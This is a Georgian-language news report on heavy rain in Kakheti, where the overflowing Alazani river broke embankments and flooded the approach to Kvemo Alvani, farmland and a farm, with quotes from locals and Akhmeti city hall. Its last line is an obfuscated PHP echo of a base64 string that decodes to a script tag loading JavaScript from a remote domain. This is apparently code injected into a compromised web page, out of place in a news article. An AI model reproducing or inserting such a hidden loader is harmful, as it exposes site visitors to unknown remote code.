celsiusi
ავერსი საქკაბელი

უხვმა ნალექმა კახეთში პრობლემები შექმნა. კერძოდ, ძლიერმა წვიმამ პრობლემები შექმნა ახმეტის და თელავის მუნიციპალიტეტში.

ადგილობრივების თქმით, ადიდებულია მდინარე ალაზანი. მოვარდნილმა წყალმა გაარღვია დამცავი ჯებირები და დატბორა სოფელ ქვემო ალვანის შესასვლელი და სამეურნეო სავარგულები.

დაიტბორა ასევე, ერთ-ერთი ფერმა და მიმდებარე ტერიტორია.

"საშინელი წვიმა იყო,მთელი ღამე არ გადაუღია. ღამით დაიწყო წყალმა ადიდება, რის შემდეგ ჯებირი გაარღვია და ფერმაში შევარდა. მწყემსებს საქონელი დროულად, რომ არ გამოეყვანათ, დაიხრჩობოდნენ. ალაზანი ახლაც ადიდებულია, წყლის დონე საკმაოდ მაღალია და ამიტომ სამუშაოებს ვერ იწყებენ” , - ამბობენ ადგილობრივები.

ახმეტის მერიაში აცხადებენ, რომ ადიდებული მდინარე მოსახლეობას საფრთხეს არ უქმნის რაც შეეხება ყველა შესაბამისი ტექნიკა მობილიზებულია და დაიწყება სამუშაოები.

გადაუღებელი წვიმების გამო კახეთში თითქმის ყველა მდინარე ადიდებულია.

201
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");